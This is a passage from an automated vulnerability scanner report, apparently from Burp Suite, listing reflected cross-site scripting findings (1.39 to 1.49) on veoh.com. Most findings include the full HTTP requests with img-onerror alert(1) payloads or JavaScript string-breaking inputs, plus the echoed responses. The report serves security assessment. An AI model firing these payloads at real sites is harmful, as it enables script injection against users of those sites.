GET /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB80777'%3b1ead9050767 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:48 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'b138432a0face8cd7e780e59252637f7',
'v20756872Ta2Y7sDB80777';1ead9050767'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.39. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20757961gnh48zmS

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55707"><img%20src%3da%20onerror%3dalert(1)>2b623c86a4a was submitted in the REST URL parameter 4. This input was echoed as 55707"><img src=a onerror=alert(1)>2b623c86a4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure55707"><img%20src%3da%20onerror%3dalert(1)>2b623c86a4a/watch/v20757961gnh48zmS HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:23 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=100
Content-Length: 76349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure55707"><img src=a onerror=alert(1)>2b623c86a4a/sort/most viewed" selected="selected">
...[SNIP]...

1.40. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20757961gnh48zmS

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9c05<img%20src%3da%20onerror%3dalert(1)>ebb993b4b67 was submitted in the REST URL parameter 4. This input was echoed as a9c05<img src=a onerror=alert(1)>ebb993b4b67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventurea9c05<img%20src%3da%20onerror%3dalert(1)>ebb993b4b67/watch/v20757961gnh48zmS HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=78
Content-Length: 76305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurea9c05<img src=a onerror=alert(1)>ebb993b4b67"}</textarea>
...[SNIP]...

1.41. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20757961gnh48zmS

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1adb'%3b90455422d30 was submitted in the REST URL parameter 6. This input was echoed as a1adb';90455422d30 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20757961gnh48zmSa1adb'%3b90455422d30 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:47 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=42
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'78598efc6e65465524451afb8963c2f3',
'v20757961gnh48zmSa1adb';90455422d30'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.42. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20758438BTte3QQz

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81165"><img%20src%3da%20onerror%3dalert(1)>17f00c2e735 was submitted in the REST URL parameter 4. This input was echoed as 81165"><img src=a onerror=alert(1)>17f00c2e735 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure81165"><img%20src%3da%20onerror%3dalert(1)>17f00c2e735/watch/v20758438BTte3QQz HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:36 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=68
Content-Length: 74599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure81165"><img src=a onerror=alert(1)>17f00c2e735/sort/most viewed" selected="selected">
...[SNIP]...

1.43. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20758438BTte3QQz

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1f894<img%20src%3da%20onerror%3dalert(1)>9de463e3ec9 was submitted in the REST URL parameter 4. This input was echoed as 1f894<img src=a onerror=alert(1)>9de463e3ec9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure1f894<img%20src%3da%20onerror%3dalert(1)>9de463e3ec9/watch/v20758438BTte3QQz HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=70
Content-Length: 74555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure1f894<img src=a onerror=alert(1)>9de463e3ec9"}</textarea>
...[SNIP]...

1.44. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20758438BTte3QQz

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d86c9'%3b11294ec602e was submitted in the REST URL parameter 6. This input was echoed as d86c9';11294ec602e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20758438BTte3QQzd86c9'%3b11294ec602e HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:52 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=60
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'c0d9e3d7f1023f54ebaf4a7452132be1',
'v20758438BTte3QQzd86c9';11294ec602e'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.45. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 218d8'%3b167cb8b726a was submitted in the REST URL parameter 6. This input was echoed as 218d8';167cb8b726a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr218d8'%3b167cb8b726a HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:35:35 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=69
Content-Length: 94329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'6517df68b38a6e9c69de74651b741324',
'v20759029Mf8YXNhr218d8';167cb8b726a'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.46. http://www.veoh.com/browse/videos/category/action_adventure4957f [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b947"><img%20src%3da%20onerror%3dalert(1)>1a22388a0a was submitted in the REST URL parameter 4. This input was echoed as 1b947"><img src=a onerror=alert(1)>1a22388a0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure4957f1b947"><img%20src%3da%20onerror%3dalert(1)>1a22388a0a HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:34:23 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=75
Content-Length: 57867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure4957f1b947"><img src=a onerror=alert(1)>1a22388a0a/sort/most viewed" selected="selected">
...[SNIP]...

1.47. http://www.veoh.com/browse/videos/category/action_adventure4957f [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 265a6<img%20src%3da%20onerror%3dalert(1)>59b74d09c35 was submitted in the REST URL parameter 4. This input was echoed as 265a6<img src=a onerror=alert(1)>59b74d09c35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure4957f265a6<img%20src%3da%20onerror%3dalert(1)>59b74d09c35 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 57833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure4957f265a6<img src=a onerror=alert(1)>59b74d09c35"}</textarea>
...[SNIP]...

1.48. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f"><img%20src=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('')

Issue detail

The value of REST URL parameter 4 is copied into the name of an HTML tag attribute. The payload f915b><img%20src%3da%20onerror%3dalert(1)>991aab001b7 was submitted in the REST URL parameter 4. This input was echoed as f915b><img src=a onerror=alert(1)>991aab001b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure4957f"><img%20srcf915b><img%20src%3da%20onerror%3dalert(1)>991aab001b7=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:35:18 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=40
Content-Length: 76933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<img srcf915b><img src=a onerror=alert(1)>991aab001b7=a onerror=alert(1)>
...[SNIP]...

1.49. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f"><img%20src=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('')

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ddc51<img%20src%3da%20onerror%3dalert(1)>095a10c6f35 was submitted in the REST URL parameter 4. This input was echoed as ddc51<img src=a onerror=alert(1)>095a10c6f35 in the application's response.

